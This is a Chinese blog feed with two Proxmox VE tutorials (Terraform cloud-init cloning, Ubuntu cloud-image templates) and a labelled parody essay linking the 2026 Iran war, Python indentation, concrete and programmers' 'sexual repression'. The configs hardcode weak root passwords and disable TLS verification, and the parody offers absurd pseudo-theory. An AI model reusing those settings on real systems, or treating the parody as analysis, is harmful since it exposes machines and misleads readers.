inuyume Blog一个无人使然の小站https://blog.fiveqm.com/zh_CNTerraform 联动 Proxmox VE 's cloud-imageshttps://blog.fiveqm.com/archives/terraform_pve_vm/https://blog.fiveqm.com/archives/terraform_pve_vm/使用 Terraform 搭配cloudinit 在Proxmox VE 克隆虚拟机Mon, 16 Mar 2026 00:00:00 GMT<h1>1.创建用户</h1> <pre><code> # Proxmox 9 及更新版本 pveum role add TerraformProv -privs "Datastore.AllocateSpace Datastore.AllocateTemplate Datastore.Audit Pool.Allocate Pool.Audit Sys.Audit Sys.Console Sys.Modify VM.Allocate VM.Audit VM.Clone VM.Config.CDROM VM.Config.Cloudinit VM.Config.CPU VM.Config.Disk VM.Config.HWType VM.Config.Memory VM.Config.Network VM.Config.Options VM.Migrate VM.PowerMgmt SDN.Use" pveum user add terraform-prov@pve --password &lt;password&gt; pveum aclmod / -user terraform-prov@pve -role TerraformProv # Proxmox 8 及更早版本 veum role add TerraformProv -privs "Datastore.AllocateSpace Datastore.AllocateTemplate Datastore.Audit Pool.Allocate Sys.Audit Sys.Console Sys.Modify VM.Allocate VM.Audit VM.Clone VM.Config.CDROM VM.Config.Cloudinit VM.Config.CPU VM.Config.Disk VM.Config.HWType VM.Config.Memory VM.Config.Network VM.Config.Options VM.Monitor VM.Migrate VM.PowerMgmt SDN.Use" pveum user add terraform-prov@pve --password &lt;password&gt; pveum aclmod / -user terraform-prov@pve -role TerraformProv </code></pre> <h1>2.上传基础cloudinit配置</h1> <pre><code>mkdir /var/lib/vz/snippets tee /var/lib/vz/snippets/qemu-guest-agent.yml &lt;&lt;EOF #cloud-config runcmd: - apt update - apt install -y qemu-guest-agent - systemctl start qemu-guest-agent EOF </code></pre> <h1>3.创建cloud-image模板</h1> <pre><code>wget https://cloud.debian.org/images/cloud/trixie/latest/debian-13-genericcloud-amd64.qcow2 qm create 9000 --name debianTemplate qm set 9000 --ide0 local-lvm:0,import-from=/root/debian-12-genericcloud-amd64.qcow2 qm template 9000 </code></pre> <h1>4.编写main.tf</h1> <h2>1.克隆创建单个虚拟机</h2> <pre><code>terraform { required_version = "~&gt; 1.14.0" required_providers { proxmox = { source= "telmate/proxmox" version="=3.0.2-rc07" } } } provider "proxmox" { pm_api_url = "http://pve:8006/api2/json" pm_user = "terraform-prov@pve" pm_password = "password" pm_tls_insecure = true # 关闭tls验证 } resource "proxmox_vm_qemu" "cloudinit-example" { vmid = 100 # 虚拟机id name = "test-terraform0" #虚拟机名字 target_node = "pve" # 资源节点 agent = 1 #开启qemu-agent cores = 1 #CPU数 memory = 1024 #内存 boot = "order=ide0" # 启动磁盘 clone = "debianTemplate" # 模板名称 scsihw = "virtio-scsi-single" vm_state = "running" # "stopped" automatic_reboot = true #自动重启 # Cloud-Init 配置 cicustom = "vendor=local:snippets/qemu-guest-agent.yml" # /var/lib/vz/snippets/qemu-guest-agent.yml ciupgrade = false # 升级程序包 nameserver = "10.0.0.1" ipconfig0 = "ip=10.0.0.2/24,gw=10.0.0.1,ip6=dhcp" # 如果ipv4 也需要dncp的话可以使用 "ip=dncp,ip6=dhcp" skip_ipv6 = true ciuser = "root" cipassword = "Pass@123" # sshkeys = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE/Pjg7YXZ8Yau9heCc4YWxFlzhThnI+IhUx2hLJRxYE Cloud-Init@Terraform" # Most cloud-init images require a serial device for their display serial { id = 0 type = "socket" } disks { ide { ide0 { disk { storage = "local-lvm" size = "5G" } } # Some images require a cloud-init disk on the IDE controller, others on the SCSI or SATA controller ide1 { cloudinit { storage = "local-lvm" } } } } network { id = 0 bridge = "vmbr0" model = "virtio" } } </code></pre> <h3>应用配置</h3> <pre><code>terraform init terraform apply # 销毁可以使用 terraform destroy </code></pre> <h2>2.部署多台机器</h2> <pre><code>terraform { required_version = "~&gt; 1.14.0" required_providers { proxmox = { source= "telmate/proxmox" version="=3.0.2-rc07" } } } provider "proxmox" { pm_api_url = "http://pve/api2/json" pm_user = "terraform-prov@pve" pm_password = "password" pm_tls_insecure = true } resource "proxmox_vm_qemu" "cloudinit-example" { count =3 vmid = count.index+101 name = "test-terraform${count.index}" target_node = "pve" agent = 1 cores = 1 memory = 1024 boot = "order=ide0" # 启动磁盘 clone = "debianTemplate" # 模板名称 scsihw = "virtio-scsi-single" vm_state = "running" # "stopped" automatic_reboot = true # Cloud-Init 配置 cicustom = "vendor=local:snippets/qemu-guest-agent.yml" # /var/lib/vz/snippets/qemu-guest-agent.yml ciupgrade = false # 升级程序包 nameserver = "10.0.0.1" ipconfig0 = "ip=10.0.0.2/24,gw=10.0.0.1,ip6=dhcp" # 如果ipv4 也需要dncp的话可以使用 "ip=dncp,ip6=dhcp" skip_ipv6 = true ciuser = "root" cipassword = "Pass@123" # sshkeys = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE/Pjg7YXZ8Yau9heCc4YWxFlzhThnI+IhUx2hLJRxYE Cloud-Init@Terraform" # Most cloud-init images require a serial device for their display serial { id = 0 type = "socket" } disks { ide { ide0 { disk { storage = "local-lvm" size = "5G" } } ide1 { cloudinit { storage = "local-lvm" } } } } network { id = 0 bridge = "vmbr0" model = "virtio" } } </code></pre> Proxmox VE 's cloud-images 之 Ubuntu 篇https://blog.fiveqm.com/archives/proxmox_ve_cloud-image_ubuntu/https://blog.fiveqm.com/archives/proxmox_ve_cloud-image_ubuntu/使用 Proxmox VE 安装Ubuntu云镜像并创建模板Thu, 12 Mar 2026 00:00:00 GMT<h2>1.下载云镜像</h2> <ul> <li> <h4>可以在Ubuntu官方下载https://cloud-images.ubuntu.com/ &lt;br&gt;</h4> <img src="./1.png" alt="1.png" /> <img src="./2.png" alt="2.png" /> <img src="./3.png" alt="3.png" /></li> </ul> <p>:::tip 如何官方镜像慢可以使用镜像&lt;br&gt; 中国科学院软件研究所https://mirror.iscas.ac.cn/ubuntu-cloud-images/ &lt;br&gt; 华为云https://repo.huaweicloud.com/ubuntu-cloud-images/ :::</p> <ul> <li> <h5>进入pve webui</h5> </li> </ul> <p><img src="./4.png" alt="4.png" /> <img src="./5.png" alt="4.png" /></p> <h2>2.创建虚拟机</h2> <p><img src="./6.png" alt="6.png" /> <img src="./7.png" alt="7.png" /> <img src="./8.png" alt="8.png" /> <img src="./9.png" alt="9.png" /> <img src="./10.png" alt="10.png" /> <img src="./11.png" alt="11.png" /> <img src="./12.png" alt="12.png" /> <img src="./13.png" alt="13.png" /> <img src="./14.png" alt="14.png" /> <img src="./15.png" alt="15.png" /></p> <blockquote> <p>升级程序包建议选择否&lt;brs&gt; 现在就可以直接开启虚拟机了</p> </blockquote> <h2>3.后续</h2> <p>:::tip 如果只设置密码需要进行ssh root 远程登录,除了需要修改/etc/ssh/sshd_config 之外还需要注意/etc/ssh/sshd_config.d/ 下的配置文件 ; sshd_config.d 下的配置文件优先级高于sshd_config 可以选择修改、删除或者选择在sshd_config 中 注释掉包含sshd_config.d :::</p> <ul> <li>更换中科大APT 源 (可选)</li> </ul> <pre><code> #DEB822 格式 sudo sed -i 's@//.*archive.ubuntu.com@//mirrors.ustc.edu.cn@g' /etc/apt/sources.list.d/ubuntu.sources #sources.list 格式 sudo sed -i 's@//.*archive.ubuntu.com@//mirrors.ustc.edu.cn@g' /etc/apt/sources.list </code></pre> <ul> <li>安装qemu-guest-agent</li> </ul> <pre><code>sudo apt update sudo apt install qemu-guest-agent -y sudo systemctl start qemu-guest-agent </code></pre> <ul> <li>现在可以将虚拟机关机转换为模板了</li> </ul> 在当下伊朗局势对Python和六号钢筋混凝土的相似性理论研究的影响与当代程序的"性"压抑的程度影响的理论性分析https://blog.fiveqm.com/archives/shit/https://blog.fiveqm.com/archives/shit/在当下伊朗局势对Python和六号钢筋混凝土的相似性理论研究的影响与当代程序的"性"压抑的程度影响的理论性分析Tue, 10 Mar 2026 00:00:00 GMT<p>:::tip 本论文只是根据最近的<a href="https://shitjournal.org/">S.H.I.T</a> 下的抽象产物,无任何的政治立场和观点。 :::</p> <h2><strong>引言:物质、逻辑与欲望的结构主义同构</strong></h2> <p>在当代前沿技术哲学、地缘政治学、材料工程学与精神分析学的高度交叉领域,传统的学科边界正在经历一场深刻的解构与重塑。根据《S.H.I.T Journal》(Sociological, Hermeneutic, Information and Technology Journal,社会学、诠释学、信息与技术期刊)所倡导的激进跨学科认识论,物理空间的防线、数字逻辑的语法边界以及人类精神图景中的力比多(Libido)流向,绝非孤立存在的现象,而是受制于同一种深层权力拓扑学的“结构性约束”。2026年2月底爆发的伊朗地缘政治危机——即由美国和以色列联合发动的“史诗狂怒”(Operation Epic Fury)与“怒吼雄狮”(Operation Roaring Lion)行动,不仅在地缘政治版图上制造了物理与数字的双重废墟,更在本体论层面上提供了一个前所未有的极端样本,迫使我们重新审视“刚性结构”的脆弱性与规训本质 1。<br /> 在这一宏大的理论视野下,本文旨在探讨三个看似风马牛不相及,实则在结构主义层面上高度同构的客体:作为现代建筑防御与承重体系绝对象征的“六号钢筋混凝土”、作为当代最广泛使用且以强制缩进(Off-side rule)为核心特征的“Python编程语言”,以及在国家机器与编译器双重规训下所引发的“当代程序的‘性’压抑”。六号钢筋混凝土与Python语言的相似性理论研究,过去一直停留在静态的力学与语法类比上;然而,2026年伊朗局势中物理导弹基地的彻底崩塌与国家信息网络(NIN)作为“数字混凝土”的全面封锁,为这一理论注入了动态的、暴力的外部扰动变量 3。<br /> 本文将详尽剖析2026年伊朗危机中的军事动能打击与赛博空间封锁如何映射了结构材料的受力极限与编程语言的解析器边界。同时,深度引入弗洛伊德(Freud)、拉康(Lacan)、德勒兹(Deleuze)与齐泽克(Žižek)的精神分析与欲望机器(Desiring-Machines)理论,系统性地论述当代程序员在刚性语法架构下所经历的“性”压抑(Sexual Repression)程度,揭示这种由于力比多经济学被编码、辖域化而导致的欲望升华,如何完美地呼应了宏观地缘政治中的极权生命政治控制 4。通过对上述复杂变量的综合理论推演,本文将重新定义数字时代中“架构”、“约束”与“逃逸”的哲学内涵。</p> <h2><strong>第一部分:物理废墟与数字防线——2026伊朗局势的结构动力学解析</strong></h2> <p>要理解这一复杂的相似性理论,首先必须对2026年伊朗危机的物理与数字双重结构演变进行详尽的解构。这场冲突不仅仅是国家武装力量的碰撞,更是不同形式的“结构完整性”(Structural Integrity)在极端外部应力下的生存测试。</p> <h3><strong>1.1 “史诗狂怒”与“怒吼雄狮”:物理混凝土防线的解体</strong></h3> <p>2026年2月28日凌晨(美东时间凌晨2:00),美国中央司令部与以色列国防军发起了代号分别为“史诗狂怒”与“怒吼雄狮”的大规模联合军事行动 1。与2025年6月主要针对核设施的有限打击(代号“午夜之锤”)不同,此次行动的目标旨在系统性地摧毁伊朗的政权中枢、军事指挥系统、海军力量以及深埋于地下的弹道导弹基础设施 1。<br /> 在最初的48至80小时内,超过100架美国战机(包括轰炸机与电子战机)以及约200架以色列空军战机(包括F-35I“阿迪尔”、F-15I“雷电”和F-16I),向伊朗境内的大约500至1250个目标投掷了数千枚精确制导弹药 9。其中,最引人注目的打击对象是依靠超高强度钢筋混凝土(可类比为六号及以上标号的重型特种混凝土)构建的地下导弹基地。根据卫星图像与军事情报分析,位于霍尔木兹甘省的Khorgo基地、伊斯法罕省的重建基地、洛雷斯坦省的Khorramabad基地(及其新建的隧道网络入口),以及东阿塞拜疆省的Tabriz基地,均遭受了毁灭性的钻地动能打击 3。<br /> 在材料工程学中,钢筋混凝土的结构完整性构成了流固耦合(Fluid-Structure Interaction, FSI)的边界条件 11。六号钢筋混凝土以其极高的抗压强度(由水泥骨料提供)和抗拉强度(由内部钢筋矩阵提供),代表了防御工程的最高刚性。然而,在JDAM和Spice系列精确制导武器的非线性高频震荡与物理穿透下,这种绝对刚性暴露出其致命的脆性弱点。当外部应力突破了材料的屈服极限,混凝土不仅无法吸收能量,反而因为内部应力的集中而发生灾难性的结构崩塌。这种物理实体的碎裂,宣告了依赖僵化、不可变结构以抵御动态复杂系统攻击的传统防御哲学的破产 9。</p> <h3><strong>1.2 国家信息网络(NIN):浇筑数字空间的钢筋混凝土</strong></h3> <p>在物理防御设施土崩瓦解的同一时刻,伊朗政权在数字维度上启动了更为极端的控制机制。自战争爆发起,伊朗经历了历史上最深、最全面的互联网中断(Internet Blackout)。根据NetBlocks与佐治亚理工学院互联网情报实验室的监测,伊朗的互联网连接率骤降至正常水平的4%,甚至一度触及1% 13。<br /> 这种断网并非简单的拔除物理线缆,而是依赖于伊朗长期构建的“国家信息网络”(National Information Network, NIN)架构 16。NIN的设计理念与六号钢筋混凝土的工程逻辑如出一辙:它通过设立不可逾越的边界,将数字空间强行切割为“国内内联网”与“全球互联网”两个平行的领域 16。在这一结构中,NIN实施了所谓的分层互联网(Layered Internet Structure),根据用户的社会与政治身份赋予不同的访问权限,形成了一种数字种姓制度 18。<br /> 学者将这种通过强制网络架构来实现生命政治监控的机制称为“认知墓地”(Cognitive Necropolis)4。NIN如同浇筑在赛博空间中的隐形混凝土墙,它排斥一切未被官方协议批准的动态连接。这种对数字信号流动的强制阻断,其本质是为了在国家面临生存危机的时刻,通过彻底消除信息熵来维持绝对的系统稳定性。政权试图利用这套“数字主权”系统,不仅掩盖国内因抗议和战争造成的动荡(包括掩盖数万人的死伤),更将其作为防御外部网络信息战的终极防线 19。然而,正如下文将要分析的,这种对信息流动的绝对封闭,与Python编程语言中强制缩进对逻辑流动的封闭,具有哲学概念上的一致性。</p> <table> <thead> <tr> <th>结构参数</th> <th>物理防御:六号钢筋混凝土掩体</th> <th>数字防御:国家信息网络 (NIN)</th> <th>面临的外部极力测试 (2026年事件)</th> </tr> </thead> <tbody> <tr> <td><strong>基础材质</strong></td> <td>高标号水泥、骨料与高强度钢筋矩阵</td> <td>BGP路由黑洞、深层数据包检测 (DPI)</td> <td>“史诗狂怒”联合打击、全球黑客攻击</td> </tr> <tr> <td><strong>空间拓扑</strong></td> <td>封闭的地下隧道与垂直发射井网格</td> <td>与全球互联网物理/逻辑隔离的局域网</td> <td>以色列与美国的多域渗透 (Multi-domain)</td> </tr> <tr> <td><strong>抗压机制</strong></td> <td>依靠材料内聚力抵御外部钻地动能冲击</td> <td>通过切断96%国际流量维持内部信息真空</td> <td>精确制导武器打击、BadeSaba等应用被劫持</td> </tr> <tr> <td><strong>破坏表现</strong></td> <td>超过屈服强度后的灾难性脆性崩塌</td> <td>“认知墓地”的内部窒息与民众的VPN规避</td> <td>物理基地被摧毁、反政府心理战信息广泛传播</td> </tr> </tbody> </table> <h2><strong>第二部分:Python语言与六号钢筋混凝土的相似性理论重构</strong></h2> <p>在阐明了伊朗危机的宏观物质与数字结构后,我们必须将分析的显微镜转向软件工程的微观语法世界。探讨Python编程语言与六号钢筋混凝土的相似性理论,是本文的核心理论支点之一。</p> <h3><strong>2.1 强制缩进(The Off-Side Rule)与空间刚性力学</strong></h3> <p>在计算机编程语言的演进史中,如何界定代码的逻辑块(Block structure)一直是一个具有高度哲学意味的争论焦点 21。在传统的C语言家族(如C, C++, Java, JavaScript)中,逻辑块由大括号 {} 明确界定,而空白符(空格、制表符、换行)对编译器而言是隐形的、无意义的。这种设计赋予了程序员极大的空间自由度,只要括号匹配,代码在三维屏幕空间中的排列可以是任意的,其逻辑结构依然稳固。这类似于现代建筑中的钢结构框架体系,内部空间的隔断可以随意拆改而不影响建筑的主体承重。<br /> 然而,由吉多·范罗苏姆(Guido van Rossum)设计的Python语言,采取了截然不同的结构主义进路。Python采纳了彼得·兰丁(Peter Landin)提出的“越位规则”(Off-side rule),将空白符(Whitespace)与缩进(Indentation)提升至具有绝对语义价值的本体论地位 22。在Python中,缩进不仅是视觉上的排版美学,更是逻辑结构本身。<br /> 这一设计在力学原理上与六号钢筋混凝土形成了惊人的相似性。在钢筋混凝土中,结构完整性取决于材料的精确配比与几何形状的刚性锁定;一旦结构发生形变,其承载能力将呈指数级下降 11。同样地,在Python代码中,每一行代码的缩进深度如同混凝土中的钢筋网格节点,严格规定了控制流(Control flow)的承载边界。即使是一个空格的意外偏移,也会引发灾难性的 IndentationError(缩进错误),导致整个程序的逻辑大厦瞬间坍塌 24。<br /> 这种强制性的空间对齐(Spatial Alignment)剥夺了编程主体对符号空间进行个性化布局的权力。正如《结构主义与人工智能》研究所指出的,Python的缩进机制反映了一种追求“精确与清晰”的结构主义哲学,每一行代码的位置都必须严丝合缝地嵌入预设的逻辑前提之中 25。这种刚性对于初学者而言似乎是友好的(因为它强迫形成统一的代码外观),但在面对百万行级别的大型项目时,过度的语法刚度会导致极大的重构摩擦力(Refactoring friction)26。这就如同在已经成型的六号钢筋混凝土墙上试图开凿新的承重门洞——不仅困难重重,且极易引发不可预知的结构性断裂。</p> <h3><strong>2.2 动态类型的“虚幻自由”与内部应力隐蔽</strong></h3> <p>在这个相似性理论中,存在一个极其深刻的本体论悖论:尽管Python在空间布局上表现出如同钢筋混凝土般的严酷与刚性,但它在类型系统(Type System)上却采用了动态类型(Dynamic Typing)与弱约束机制 24。<br /> 如果说强制缩进构成了代码大厦的坚硬外壳与承重墙,那么动态类型则使得这栋大厦内部流动的“数据流”变成了没有固定形态的流体。在静态类型语言(如Rust, C#)中,编译器在编译阶段就会对变量的类型进行严格审查,类似于在混凝土浇筑前对每一根钢筋的材质进行X光探伤 27。而在Python中,变量可以在运行时(Runtime)随意改变其绑定的对象类型,这种运行时的模糊性(Ambiguity)使得许多本该在构建阶段暴露的逻辑错误,被隐藏在了程序的深层执行路径之中 24。<br /> 这就导致了一种“结构性虚空”或“逻辑空鼓”的危险现象。在一个拥有10^13个条件分支和深不见底的调用栈的庞大Python系统中,由于缺乏编译期的静态类型校验,程序可能在表面上因为完美的缩进而显得坚不可摧,但在其内部深处,由于类型不匹配引发的致命缺陷正在悄然积累 28。这种内部柔性与外部刚性的剧烈冲突,正是许多大型动态类型代码库在后期维护中面临崩溃的根本原因 27。<br /> 这一微观的软件工程学矛盾,竟然奇迹般地在2026年的伊朗宏观政治局势中找到了其完美的倒影。伊朗的NIN(数字防线)与极权审查制度构成了国家机器无比坚硬的“强制缩进”,不允许社会成员有任何偏离官方设定的政治行为轨迹 4。然而,在其封闭的系统内部,长达四十七年的社会矛盾、严重的经济危机以及对神权统治的幻灭感,构成了社会肌理中高度不稳定且不断变异的“动态类型”4。表面上整齐划一的社会秩序掩盖了内部巨大的断裂应力;当美以联军的外部打击(作为不可预见的运行时异常输入)到来时,这种外刚内虚的系统瞬间爆发了大规模的抗议、狂欢与结构性解体 29。</p> <h2><strong>第三部分:当代程序的“性”压抑——精神分析视域下的力比多经济学</strong></h2> <p>如果说强制缩进仅仅是语法现象,那么它是如何转化为对编程主体(程序员)的深刻心理压抑的?在《S.H.I.T Journal》的理论话语中,技术从不是中立的工具;它是权力、意识形态以及无意识欲望的物质化载体。为了彻底解构Python等当代高级语言对人类精神拓扑学的影响,我们必须引入精神分析学派(尤其是弗洛伊德、拉康)与后结构主义(德勒兹、加塔利)的深刻洞见。</p> <h3><strong>3.1 弗洛伊德、升华与代码的文明化过程</strong></h3> <p>在西格蒙德·弗洛伊德(Sigmund Freud)的经典精神分析理论中,“性”压抑(Sexual Repression)不仅是个体神经症的根源,更是整个人类文明赖以建立的基石 31。文明要求个体放弃原始的、追求即时满足的力比多(Libido)冲动,通过“升华”(Sublimation)将其转化为符合社会规范的、有益于生产的劳动能量。在维多利亚时代,这种压抑主要体现在对肉体欲望的严格社会禁忌与道德规训之中,导致了普遍的过度社会化(Oversocialization)33。<br /> 而在21世纪的数字资本主义语境下,压抑的场域已经发生了深刻的转移。当代社会的“性”压抑不再仅仅局限于卧室之中,而是弥散并编码在主体的日常生产活动——尤其是软件代码的编写之中 35。编程,从其本质来看,是一种高度力比多化的创造性活动。程序员在面对空白屏幕时,原始的编码冲动(即试图打破规则、创造新连接的欲望)涌动不息。早期的黑客文化或使用Lisp等宏语言的极客,能够在代码的汪洋中自由驰骋,享受一种近乎于“多形性反常”(Polymorphous perversity)的语法快感 6。<br /> 然而,Python等“现代工业级”语言的崛起,代表了资本主义机器对这种自由欲望的全面收编与规训。强制缩进、PEP 8编码规范以及“Pythonic”(Pythonic即所谓的“唯一正确且优雅的方法”)的意识形态,充当了严厉的弗洛伊德式“超我”(Superego)角色。它们对代码的每一处空格、每一个换行进行严苛的审查。程序员的力比多被迫升华,其狂野的创造力被挤压进整齐划一、极其同质化的语法方格中。这种对代码形式的过度规范,导致了当代程序员在面对技术架构时体验到一种深度的结构性压抑。</p> <h3><strong>3.2 拉康的符号界与“倒错”的力比多经济学</strong></h3> <p>雅克·拉康(Jacques Lacan)的理论为我们提供了更深一层的分析工具。在拉康看来,无意识本身就是像语言一样被结构化的(The unconscious is structured like a language)6。进入语言(符号界,The Symbolic)的过程,必然伴随着一种不可逆的缺失(缺乏,Lack)与“阉割”(Castration)。<br /> 当代编程语言正是这一符号界秩序的最集中体现。编译器(Compiler)或解释器(Interpreter)在此扮演了大他者(The big Other)的角色——它无所不知、无情且不容辩驳。当Python解释器因为一个空格的错误而抛出 SyntaxError 时,它不仅仅是在报告一个技术缺陷,它是在执行大他者的绝对律法,宣告主体的符号表达是不合法的。<br /> 这种长期的压抑引发了齐泽克(Slavoj Žižek)所描述的力比多经济学(Libidinal Economy)中的“倒错”(Perversion)机制 6。倒错的主体不仅接受了压抑,反而从作为压抑工具的过程中获得了反向的快感。我们观察到,许多现代程序员狂热地推崇代码格式化工具(如 Black 或 Yapf 40),并对任何不符合“Pythonic”范式的代码进行近乎宗教裁判所般的攻击。这种对语法纯洁性的病态痴迷,正是被压抑的力比多在寻找替代性出口;程序员通过将自己认同为大他者(编译器规则)的执行工具,从对自我及他人的微观权力施加中榨取剩余快感(Surplus-jouissance)。代码成为了一种恋物癖(Fetish)的对象,其表面整洁的美学掩盖了内部欲望被极度阉割的残酷事实 6。</p> <h3><strong>3.3 德勒兹的欲望机器与抵抗的拓扑</strong></h3> <p>吉尔·德勒兹与菲利克斯·加塔利在《反俄狄浦斯:资本主义与精神分裂症》中,提出了一种与弗洛伊德和拉康截然不同的欲望生产模型 5。在他们看来,欲望不是源于“缺乏”,而是生产性的、肯定性的力量,主体本身就是各种连接、断裂和流动的“欲望机器”(Desiring-Machines)5。<br /> 资本主义的社会机器(Social Machine)试图捕捉这些无序的、游牧式的欲望流,将其“辖域化”(Territorialize)并铭刻在“无器官身体”(Body without Organs, BwO)的表面之上 41。在软件工程领域,由C++、Java乃至Python等强迫性结构主导的现代软件架构,就是这样一台庞大的社会辖域化机器。它迫使“代码-欲望”在预设的层级结构(如对象继承树、强制缩进块)中流动,禁止任何不规则的横向连接(例如滥用 goto 语句或无限制的全局指针游走)。<br /> 当代码的自由组合被Python的缩进机制牢牢锁死时,程序的“性”压抑达到了顶峰。然而,德勒兹理论的乐观之处在于,欲望的流变是永远无法被完全控制的,它总会寻找逃逸线(Lines of flight)。后文我们将看到,在面临外部极端压力时,无论是在数字网络还是物理世界,这种被压抑的能量将如何通过黑客行动与地下抗争爆发出来。</p> <table> <thead> <tr> <th>理论家 / 学派</th> <th>核心概念 (精神分析/后结构主义)</th> <th>在当代编程架构中的投射与体现</th> <th>导致的结果 ("性"压抑的具体表征)</th> </tr> </thead> <tbody> <tr> <td><strong>弗洛伊德 (Freud)</strong></td> <td>升华 (Sublimation)、超我规训</td> <td>编码规范 (PEP 8)、消除混乱的“Spaghetti code”</td> <td>原始编码冲动的压抑,创造力被框定在标准库与框架内</td> </tr> <tr> <td><strong>拉康 (Lacan)</strong></td> <td>符号界律法、大他者、倒错</td> <td>编译器/解释器作为不容置疑的绝对权威</td> <td>对代码格式的恋物癖式迷恋,从服从语法规则中榨取快感</td> </tr> <tr> <td><strong>齐泽克 (Žižek)</strong></td> <td>意识形态幻象、力比多经济学</td> <td>“Pythonic”作为唯一正确的政治正确编码信条</td> <td>将结构性束缚内化为主观认同,对异端语法的排斥</td> </tr> <tr> <td><strong>德勒兹 (Deleuze)</strong></td> <td>欲望机器、辖域化与解辖域化</td> <td>强制缩进阻断了非线性的、游牧式的逻辑连接</td> <td>程序员异化为资本主义软件生产流水线上的标准化组件</td> </tr> </tbody> </table> <h2><strong>第四部分:理论的震荡与重构——伊朗局势对相似性研究的冲击效应</strong></h2> <p>将时间线拉回2026年3月那片硝烟弥漫的中东大地。伊朗危机的爆发,不仅是对全球地缘政治格局的重置,更是为我们本文所探讨的“物理刚性-代码语法-精神压抑”三位一体的理论模型提供了一个震撼的实证反演。当压抑达到极致,当结构被施加远远超出其设计阈值的动态压力时,系统究竟会发生什么?</p> <h3><strong>4.1 刚性解体的哲学启示:从地下掩体到代码重构</strong></h3> <p>“史诗狂怒”行动中以色列空军与美国武库对伊朗四大弹道导弹基地的精确摧毁,彻底打破了“高标号钢筋混凝土不可战胜”的国防工程神话 3。这为六号钢筋混凝土与Python强制缩进的相似性理论带来了第一波理论冲击:即<strong>绝对的刚性等同于绝对的脆弱性</strong>。<br /> 在力学上,混凝土结构为了追求极致的抗压能力,牺牲了系统的韧性与弹性。当美军钻地弹丸携带着巨大的动能侵彻基地的外壳时,刚性结构无法通过形变来耗散能量,最终导致整个山体与地下管网的连锁崩解。<br /> 将这一现象投射到Python等具有强制拓扑结构的软件系统中,我们可以得出深刻的警示。在面对现代复杂多变的网络环境和难以预测的运行时边缘数据(Edge cases)时,过度强调结构规整且耦合紧密的超大型Python项目,往往表现出极差的抗打击能力。由于缺乏如Lisp般可以通过元编程在运行时动态重组语法树(AST)的能力 36,一旦某个深层模块因为类型异常(动态类型的缺陷)或第三方接口的微小变动而崩溃,整个系统将如同被钻地弹击中的混凝土掩体一样,由于强制缩进带来的紧密绑定效应,引发不可逆转的雪崩式故障。因此,单纯追求外观整齐和结构锁死的编程范式,在面对赛博战和极速迭代的业务需求时,已经显得力不从心。</p> <h3><strong>4.2 国家机器作为宏观编译器:NIN的语法压迫与社会力比多的反扑</strong></h3> <p>在物理基地被摧毁的废墟上,伊朗政权试图通过加强国家信息网络(NIN)来进行数字层面的绝地反击 4。正如前文所述,NIN通过切断国际出入口,将互联网流量硬生生地“缩进”到国内网络控制流的区块之中。对于普通民众而言,使用被屏蔽的WhatsApp或访问海外新闻网站,就如同在严格的Python代码中键入了一个不被允许的制表符(Tab),会立刻遭到系统(防火墙或网络警察)的拦截与抹杀 13。<br /> 这种将整个国家的通信基建转化为一个巨型编译器的行为,将社会成员的“性”压抑(即自由交流、信息获取的力比多冲动)推向了临界点。长达数十年的神权政治统治,原本已经通过道德警察、着装规范和政治审查,对民众实施了深刻的生命政治控制 4。2026年战争期间,这种压抑通过极端的断网政策被推演至极权主义的巅峰。<br /> 然而,弗洛伊德精神分析的铁律告诉我们:被压抑之物必将复归(The Return of the Repressed)。社会力比多是无法被区区几组防火墙规则和路由黑洞所彻底消灭的。在此次冲突中,这种复归表现为一种猛烈而极具破坏性的反向宣泄。<br /> <strong>反抗的拓扑学与逃逸线:</strong><br /> 面对NIN构筑的数字钢筋混凝土墙,伊朗内外的数字游击队展现出了惊人的破坏力与创造力。被压抑的欲望机器开始运作,寻找系统的漏洞与逃逸线:</p> <ol> <li><strong>走私与卫星网络</strong>:海外侨民与美国特朗普政府秘密向伊朗境内走私了数千台Starlink(星链)终端 13。这些终端直接绕过了地面的物理光缆与BGP路由控制,直接与太空卫星通信,宛如在Python的强制块结构之外,凭空建立了一条异步的、不受主线程约束的通信通道。</li> <li><strong>地下代理与规避软件</strong>:约40万海外伊朗人利用Psiphon等加密代理协议共享带宽,帮助国内民众突破封锁 13。这在编程理论中,类似于通过深度操作系统的钩子(Hooks)或猴子补丁(Monkey Patching),强行在运行时修改程序的行为路线,从内部瓦解编译器的规则。</li> <li><strong>认知域的系统反噬(黑客攻击)</strong>:更具戏剧性的是,由于系统本身的闭塞导致的脆弱性,政权引以为傲的内部应用反而成为了反抗者的武器。拥有超过3000万安装量的国民级祈祷时间追踪应用BadeSaba被黑客攻破,并在用户的屏幕上弹出劝降与反极权信息 45。同时,伊朗国家电视台的卫星信号也被黑客成功劫持,播出了流亡王储礼萨·巴列维的讲话 13。这种攻击类似于软件工程中的代码注入攻击(Code Injection),外部恶意的、未经验证的“类型”强行涌入了受保护的内存区块,让原本用于规训的机器转过头来向其创造者开火。</li> </ol> <p>在这一刻,无论是物理的六号钢筋混凝土,还是逻辑上的NIN网络架构,亦或是象征着绝对结构规训的Python强制缩进,都在社会力比多与外部动能的双重夹击下轰然倒塌。民众在街头的狂欢(甚至是对美军空袭的暗中庆祝)以及网络空间中无处不在的抗争代码,是对长达数十年的政治与程序性“性”压抑的最彻底的解放与报复 29。</p> <h2><strong>第五部分:走向解构主义的新范式:破除结构与解放欲望</strong></h2> <p>2026年的伊朗危机不仅仅是一场改变中东格局的地缘政治地震,它更是一场具有深远认识论意义的哲学风暴。通过将军事行动的物质性破坏与网络空间的数字对抗,引入对六号钢筋混凝土与Python语言相似性理论的考察,我们得出了一个具有颠覆性的结论:<strong>试图通过无限增加结构的刚性(无论是物理的、语法的还是政治的)来实现系统的永恒稳定,是一种注定要失败的虚妄幻觉。</strong></p> <h3><strong>5.1 从结构主义向后结构主义的跨越</strong></h3> <p>当代程序的“性”压抑,根源于技术发展早期对确定性与可控性的过度迷恋。无论是早期计算科学中追求完美逻辑推演的雄心,还是后来如Python等语言通过强制排版来消除人类思维差异性(消除代码中的混乱与个性)的努力,其本质都带有强烈的现代性结构主义(Structuralism)色彩 23。<br /> 然而,当下的世界(正如战争中的伊朗所展示的那个充满赛博攻击、星链走私、民众抗议与导弹横飞的混沌系统)已经彻底进入了后现代的复杂性状态。在这样的环境中,系统的生存能力不再取决于其抵御变形的刚度,而在于其适应混乱、包容变异的柔性。<br /> 